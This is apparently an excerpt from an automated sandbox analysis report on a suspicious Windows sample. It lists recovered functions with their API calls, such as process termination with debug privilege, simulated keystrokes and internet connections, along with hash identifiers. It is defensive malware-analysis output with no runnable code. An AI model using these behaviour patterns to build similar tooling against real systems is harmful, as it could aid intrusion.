                                          • Part of subcall function 00106FBA: DeleteObject.GDI32(00000000), ref: 00106FE6
                                        • GetWindowLongW.USER32(?,000000F0), ref: 0010520D
                                        • SetWindowLongW.USER32(?,000000F0,00000000), ref: 0010521A
                                        • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0010524D
                                        • SendMessageW.USER32(?,00001001,00000000,000000FE), ref: 00105287
                                        • SendMessageW.USER32(?,00001026,00000000,000000FE), ref: 00105296
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Window$MessageSend$LongShow$DeleteFocusInvalidateObjectRect
                                        • String ID:
                                        • API String ID: 3210457359-0
                                        • Opcode ID: c71b8d184fd66e9a36f07d197d086c986e9a9722e842331c0524f05df82aa2f8
                                        • Instruction ID: afebc4e2065cf1af2e7dc3f9dd98d09bb79594f6469454466d6bdca8a6d017de
                                        • Opcode Fuzzy Hash: c71b8d184fd66e9a36f07d197d086c986e9a9722e842331c0524f05df82aa2f8
                                        • Instruction Fuzzy Hash: AB516B30A50A08FEEF24AF24CC4ABDA3B66BF05365F188111F695962E1C7F5A990DF41
                                        Function 00088B06 Relevance: 13.7, APIs: 9, Instructions: 155windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadImageW.USER32(00000000,?,?,00000010,00000010,00000010), ref: 000C6890
                                        • ExtractIconExW.SHELL32(?,?,00000000,00000000,00000001), ref: 000C68A9
                                        • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 000C68B9
                                        • ExtractIconExW.SHELL32(?,?,?,00000000,00000001), ref: 000C68D1
                                        • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 000C68F2
                                        • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00088874,00000000,00000000,00000000,000000FF,00000000), ref: 000C6901
                                        • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 000C691E
                                        • DestroyIcon.USER32(00000000,?,00000010,00000010,00000010,?,?,?,?,?,00088874,00000000,00000000,00000000,000000FF,00000000), ref: 000C692D
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Icon$DestroyExtractImageLoadMessageSend
                                        • String ID:
                                        • API String ID: 1268354404-0
                                        • Opcode ID: b3065161a495588e37348870380f5998448f75e57594c6f13cc9c27af13ee02e
                                        • Instruction ID: f0af79eaf27b8577fd5e344bb94978c7ce7858158291fb88d635f28c535f4a66
                                        • Opcode Fuzzy Hash: b3065161a495588e37348870380f5998448f75e57594c6f13cc9c27af13ee02e
                                        • Instruction Fuzzy Hash: 5D516974600209AFDB20EF24CC95FAE7BF5FB98750F108618F996972A0DB71E990DB50
                                        Function 000EC143 Relevance: 13.6, APIs: 9, Instructions: 95networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 000EC182
                                        • GetLastError.KERNEL32 ref: 000EC195
                                        • SetEvent.KERNEL32(?), ref: 000EC1A9
                                          • Part of subcall function 000EC253: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 000EC272
                                          • Part of subcall function 000EC253: GetLastError.KERNEL32 ref: 000EC322
                                          • Part of subcall function 000EC253: SetEvent.KERNEL32(?), ref: 000EC336
                                          • Part of subcall function 000EC253: InternetCloseHandle.WININET(00000000), ref: 000EC341
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Internet$ErrorEventLast$CloseConnectHandleOpen
                                        • String ID:
                                        • API String ID: 337547030-0
                                        • Opcode ID: 3986f18be59d0d40970369d527059409545faa788fd9a13c7d702e8a472618a0
                                        • Instruction ID: f32c9e564e69e9b135bf6be7e159e0560243f65eb3f00e07fb1ff3670d819a4f
                                        • Opcode Fuzzy Hash: 3986f18be59d0d40970369d527059409545faa788fd9a13c7d702e8a472618a0
                                        • Instruction Fuzzy Hash: 2D31A371100681AFEB219FA6DC04E6A7BF8FF14300B00451DFA5696A11D732E8519FA0
                                        Function 000D25A2 Relevance: 13.6, APIs: 9, Instructions: 60sleepkeyboardwindowCOMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 000D3A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 000D3A57
                                          • Part of subcall function 000D3A3D: GetCurrentThreadId.KERNEL32 ref: 000D3A5E
                                          • Part of subcall function 000D3A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,000D25B3), ref: 000D3A65
                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 000D25BD
                                        • PostMessageW.USER32(?,00000100,00000025,00000000), ref: 000D25DB
                                        • Sleep.KERNEL32(00000000,?,00000100,00000025,00000000), ref: 000D25DF
                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 000D25E9
                                        • PostMessageW.USER32(?,00000100,00000027,00000000), ref: 000D2601
                                        • Sleep.KERNEL32(00000000,?,00000100,00000027,00000000), ref: 000D2605
                                        • MapVirtualKeyW.USER32(00000025,00000000), ref: 000D260F
                                        • PostMessageW.USER32(?,00000101,00000027,00000000), ref: 000D2623
                                        • Sleep.KERNEL32(00000000,?,00000101,00000027,00000000,?,00000100,00000027,00000000), ref: 000D2627
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: MessagePostSleepThreadVirtual$AttachCurrentInputProcessWindow
                                        • String ID:
                                        • API String ID: 2014098862-0
                                        • Opcode ID: b6ca665d7f67a789c84d5667db1b732ddd20de04673ffa51d1a693ae146f5940
                                        • Instruction ID: c2ee7283797ad0c16b1cfc35b38a292b0cc6c7c6210db7249f97909900181c22
                                        • Opcode Fuzzy Hash: b6ca665d7f67a789c84d5667db1b732ddd20de04673ffa51d1a693ae146f5940
                                        • Instruction Fuzzy Hash: 6501B530390710BBFB2067689C8AF993E59EB5AB11F100102F354AE1D1C9F254848EBA
                                        Function 000D1803 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetProcessHeap.KERNEL32(00000008,0000000C,?,00000000,?,000D1449,?,?,00000000), ref: 000D180C
                                        • HeapAlloc.KERNEL32(00000000,?,000D1449,?,?,00000000), ref: 000D1813
                                        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,000D1449,?,?,00000000), ref: 000D1828
                                        • GetCurrentProcess.KERNEL32(?,00000000,?,000D1449,?,?,00000000), ref: 000D1830
                                        • DuplicateHandle.KERNEL32(00000000,?,000D1449,?,?,00000000), ref: 000D1833
                                        • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,000D1449,?,?,00000000), ref: 000D1843
                                        • GetCurrentProcess.KERNEL32(000D1449,00000000,?,000D1449,?,?,00000000), ref: 000D184B
                                        • DuplicateHandle.KERNEL32(00000000,?,000D1449,?,?,00000000), ref: 000D184E
                                        • CreateThread.KERNEL32(00000000,00000000,000D1874,00000000,00000000,00000000), ref: 000D1868
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                        • String ID:
                                        • API String ID: 1957940570-0
                                        • Opcode ID: ecfe381d0a46f7ef665834a48300c5698df0dbae5ae3de43e6d3ce65e6c851b3
                                        • Instruction ID: 68e522301030ae284cd692fff8d4b785ae6836844ad3d3d8a636c7b2793b10d5
                                        • Opcode Fuzzy Hash: ecfe381d0a46f7ef665834a48300c5698df0dbae5ae3de43e6d3ce65e6c851b3
                                        • Instruction Fuzzy Hash: 1101AC75240304FFE610AB65DC49F573B6CEB89B11F004511FA45DB591CAB09840CF60
                                        Function 000FA0E2 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 160COMMON
                                        Download Yara Rule
                                        APIs
                                          • Part of subcall function 000DD4DC: CreateToolhelp32Snapshot.KERNEL32 ref: 000DD501
                                          • Part of subcall function 000DD4DC: Process32FirstW.KERNEL32(00000000,?), ref: 000DD50F
                                          • Part of subcall function 000DD4DC: CloseHandle.KERNEL32(00000000), ref: 000DD5DC
                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 000FA16D
                                        • GetLastError.KERNEL32 ref: 000FA180
                                        • OpenProcess.KERNEL32(00000001,00000000,?), ref: 000FA1B3
                                        • TerminateProcess.KERNEL32(00000000,00000000), ref: 000FA268
                                        • GetLastError.KERNEL32(00000000), ref: 000FA273
                                        • CloseHandle.KERNEL32(00000000), ref: 000FA2C4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                        • String ID: SeDebugPrivilege
                                        • API String ID: 2533919879-2896544425
                                        • Opcode ID: b0d382b07a5fd16d7ee2401614a7403804cedcfc37deedc63f22634068d05992
                                        • Instruction ID: 74e7bf097e503c4d9b2a7e870098e22e5f3795244cf9094dd58f7d7de7d13895
                                        • Opcode Fuzzy Hash: b0d382b07a5fd16d7ee2401614a7403804cedcfc37deedc63f22634068d05992
                                        • Instruction Fuzzy Hash: D0618A702042029FD360DF18C494F69BBE1AF45318F14849CE56A4BBA3C776ED45CB92
                                        Function 00103886 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00103925
                                        • SendMessageW.USER32(00000000,00001036,00000000,?), ref: 0010393A
                                        • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00103954
                                        • _wcslen.LIBCMT ref: 00103999
                                        • SendMessageW.USER32(?,00001057,00000000,?), ref: 001039C6
                                        • SendMessageW.USER32(?,00001061,?,0000000F), ref: 001039F4
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: MessageSend$Window_wcslen
                                        • String ID: SysListView32
                                        • API String ID: 2147712094-78025650
                                        • Opcode ID: 312716f650bbd2c7face680dd8bc1f8b03d96e21a5d4b40e4572be2dc55bf254
                                        • Instruction ID: 98e07b7d48839c068f29b8c9dc166426c8a095294c06a3fc70fdafc3bb67df7a
                                        • Opcode Fuzzy Hash: 312716f650bbd2c7face680dd8bc1f8b03d96e21a5d4b40e4572be2dc55bf254
                                        • Instruction Fuzzy Hash: 5C419571A00219ABEF219F64CC49BEA77ADFF08354F100566F598E72D1D7B19980CB90
                                        Function 000DBC5E Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 137windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 000DBCFD
                                        • IsMenu.USER32(00000000), ref: 000DBD1D
                                        • CreatePopupMenu.USER32 ref: 000DBD53
                                        • GetMenuItemCount.USER32(014257A8), ref: 000DBDA4
                                        • InsertMenuItemW.USER32(014257A8,?,00000001,00000030), ref: 000DBDCC
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: Menu$Item$CountCreateInfoInsertPopup
                                        • String ID: 0$2
                                        • API String ID: 93392585-3793063076
                                        • Opcode ID: 02361bba93111f60eb118e5a3805dd382db73b21edc9db90838cb1b7dc46a934
                                        • Instruction ID: 60af39b1439842722fb63f2a74362373d73e5436af351205f3a64fcbb009d60b
                                        • Opcode Fuzzy Hash: 02361bba93111f60eb118e5a3805dd382db73b21edc9db90838cb1b7dc46a934
                                        • Instruction Fuzzy Hash: C8518E70A00309DBDB20DFA8D884BAEBBF6BF49314F15425AE4519B391E7709945CB71
                                        Function 00092D20 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117COMMON
                                        Download Yara Rule
                                        APIs
                                        • _ValidateLocalCookies.LIBCMT ref: 00092D4B
                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 00092D53
                                        • _ValidateLocalCookies.LIBCMT ref: 00092DE1
                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 00092E0C
                                        • _ValidateLocalCookies.LIBCMT ref: 00092E61
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                        • String ID: &H$csm
                                        • API String ID: 1170836740-1834196660
                                        • Opcode ID: 972d7325c257450e38eb3beff5ee858aea3af525a5549b721499336f9d6b3514
                                        • Instruction ID: 2e483de005d49b528a72ac04d33658738bf4b754cffd1ac5fcb7152bfa9291e2
                                        • Opcode Fuzzy Hash: 972d7325c257450e38eb3beff5ee858aea3af525a5549b721499336f9d6b3514
                                        • Instruction Fuzzy Hash: C9419D34E02209ABCF14DF68C885ADEBBF5BF44324F148155F814AB392DB71AA45EBD0
                                        Function 000DC874 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LoadIconW.USER32(00000000,00007F03), ref: 000DC913
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: IconLoad
                                        • String ID: blank$info$question$stop$warning
                                        • API String ID: 2457776203-404129466
                                        • Opcode ID: 539da8712ecf5a958f7b3cbfbb8705c2cde36f100d587fac7556cb709367ff40
                                        • Instruction ID: f0a33b655eac5d5fa7192ee63f15ef1da5ebfdb7bcf0aefadfa89e7661e04e7d
                                        • Opcode Fuzzy Hash: 539da8712ecf5a958f7b3cbfbb8705c2cde36f100d587fac7556cb709367ff40
                                        • Instruction Fuzzy Hash: 45110A32689307BAFB119B54DC93CEEB7DCDF15364B60402BF500A6382EBB05E41A275
                                        Function 000DDE27 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 70networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: CleanupStartup_strcatgethostbynamegethostnameinet_ntoa
                                        • String ID: 0.0.0.0
                                        • API String ID: 642191829-3771769585
                                        • Opcode ID: de03ab1a99ecadcbd98a767083c5024e51526c17699298e7f959fdf6fca11b08
                                        • Instruction ID: 38fbea092c8ec33363f813d9ee825b18bb97bcbf9d539e251128da143dac3201
                                        • Opcode Fuzzy Hash: de03ab1a99ecadcbd98a767083c5024e51526c17699298e7f959fdf6fca11b08
                                        • Instruction Fuzzy Hash: 8D110A31504205AFCB207B74DC0AEEF77ACDF11711F00016BF44596192EFB08A819FA0
                                        Function 000DED19 Relevance: 12.1, APIs: 8, Instructions: 137timeCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: _wcslen$LocalTime
                                        • String ID:
                                        • API String ID: 952045576-0
                                        • Opcode ID: 143fe7edb3fdda7ffb345908dfc8c7affd4c558b16564b87060669195365a8b7
                                        • Instruction ID: eec557a7d4c18ee27601a8b54b48ce226f22c869e81a18b8ec0651cf21d026d0
                                        • Opcode Fuzzy Hash: 143fe7edb3fdda7ffb345908dfc8c7affd4c558b16564b87060669195365a8b7
                                        • Instruction Fuzzy Hash: 59418C65C10218A6CF11FBB4C88AACFB7A8AF45710F508563E518E7262EB34E255C3A6
                                        Function 0008F8D8 Relevance: 12.1, APIs: 8, Instructions: 124COMMON
                                        Download Yara Rule
                                        APIs
                                        • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,000C682C,00000004,00000000,00000000), ref: 0008F953
                                        • ShowWindow.USER32(FFFFFFFF,00000006,?,00000000,?,000C682C,00000004,00000000,00000000), ref: 000CF3D1
                                        • ShowWindow.USER32(FFFFFFFF,000000FF,?,00000000,?,000C682C,00000004,00000000,00000000), ref: 000CF454
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: ShowWindow
                                        • String ID:
                                        • API String ID: 1268545403-0
                                        • Opcode ID: 17134f3d3bbb37feb52d2258493c494a79b04460172312b331b2d6ef11dbd311
                                        • Instruction ID: 2cc7a8105cdb248bdb6018c10efd65b5a5cd18fabca948d354309aca981d9831
                                        • Opcode Fuzzy Hash: 17134f3d3bbb37feb52d2258493c494a79b04460172312b331b2d6ef11dbd311
                                        • Instruction Fuzzy Hash: 2E413B30218682FAC779BB38C888B7E7BD2BB56314F14413CE0C792961C676A9C0CB52
                                        Function 00102D03 Relevance: 12.1, APIs: 8, Instructions: 95windowCOMMON
                                        Download Yara Rule
                                        APIs
                                        • DeleteObject.GDI32(00000000), ref: 00102D1B
                                        • GetDC.USER32(00000000), ref: 00102D23
                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00102D2E
                                        • ReleaseDC.USER32(00000000,00000000), ref: 00102D3A
                                        • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00102D76
                                        • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00102D87
                                        • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,00105A65,?,?,000000FF,00000000,?,000000FF,?), ref: 00102DC2
                                        • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 00102DE1
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                        • String ID:
                                        • API String ID: 3864802216-0
                                        • Opcode ID: 53c00044f4f781e7d6516d4bfc89b129f084dca5db5fdea4f1ffbc8a3dc9b7e6
                                        • Instruction ID: ab2979f9dcf0017645359d493b3bcd6010ec3a20eac93be8eb057a43be5fc05f
                                        • Opcode Fuzzy Hash: 53c00044f4f781e7d6516d4bfc89b129f084dca5db5fdea4f1ffbc8a3dc9b7e6
                                        • Instruction Fuzzy Hash: 96317A76201214BFEB218F50CC8AFEB3BADEF09715F044155FE889A2D1C6B59C91CBA4
                                        Function 000D5622 Relevance: 12.1, APIs: 8, Instructions: 92COMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000000.00000002.1723080738.0000000000071000.00000020.00000001.01000000.00000003.sdmp, Offset: 00070000, based on PE: true
                                        • Associated: 00000000.00000002.1723066935.0000000000070000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.000000000010C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723120943.0000000000132000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723155662.000000000013C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                        • Associated: 00000000.00000002.1723168914.0000000000144000.00000002.00000001.01000000.00000003.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_0_2_70000_031215-Revised-01.jbxd
                                        Similarity
                                        • API ID: _memcmp
                                        • String ID:
                                        • API String ID: 2931989736-0
                                        • Opcode ID: de829d349ea442c208cf22d66c9e4307a7194b1f9626ccbd5e09037f954ad4df
                                        • Instruction ID: 34efdb9cbe5a68b25b155e91469bf05e60c95b9a05d9f0ec7fb4a8894bb75e44
                                        • Opcode Fuzzy Hash: de829d349ea442c208cf22d66c9e4307a7194b1f9626ccbd5e09037f954ad4df
                                        • Instruction Fuzzy Hash: 98218671744B09B7E62555109E83FFA33ACAF10396F544026FD045BB82F7A0EE1195B5
